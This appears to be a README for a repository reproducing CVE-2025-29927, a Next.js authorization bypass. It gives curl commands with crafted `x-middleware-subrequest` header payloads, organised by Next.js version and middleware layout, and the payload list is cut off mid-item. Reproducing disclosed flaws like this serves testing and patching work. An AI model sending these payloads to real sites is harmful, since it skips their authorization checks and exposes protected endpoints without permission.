
# CVE-2025-29927 Authorization Bypass reproduction

This repository is a reproduction of the CVE-2025-29927 vulnerability in the `next` package: a request that carries a crafted `x-middleware-subrequest` header is treated by Next.js as an internal middleware sub-request, so the middleware (and any authorization check it performs) is skipped entirely.

## How to reproduce

Follow the steps below to clone and run the Next.js application.

Test that authorization denies access to the `/api/hello` endpoint:

```bash
$ curl https://localhost:3000/api/hello
{"error":"Unauthorized"}
```

Test that authorization works when a token is provided:

```bash
$ curl -H "Authorization: my-jwt-token-here" https://localhost:3000/api/hello
{"message":"Hello World"}
```

Now the check can also be bypassed, without any token, by nesting the middleware name five times in the special `x-middleware-subrequest` header (five is the recursion-depth limit at which Next.js stops running the middleware):

```bash
$ curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" https://localhost:3000/api/hello
{"message":"Hello, World"}
```

## CVE-2025-29927 exploitation for older Next.js versions

Before Next.js 12.2, middleware used a different naming convention: `_middleware.js` files placed inside the `pages` directory. From 12.2 onward the convention is a single `middleware.js` (or `src/middleware.js`) file at the root of the project. The vulnerability can be exploited in older versions by putting the corresponding middleware path in the header; those versions skip the middleware as soon as the header contains its name, so a single occurrence is enough. For example, the following payloads apply, depending on the Next.js version and your routing convention:

- `curl -H "x-middleware-subrequest: middleware" https://localhost:3000/api/hello` (for Next.js 12.2+ with the `middleware.js` file in the root of the app, not inside the `pages` directory)
- `curl -H "x-middleware-subrequest: src/middleware" https://localhost:3000/api/hello` (for a `src/middleware.js` layout)
- `curl -H…`
Exploit for CVE-2025-29927

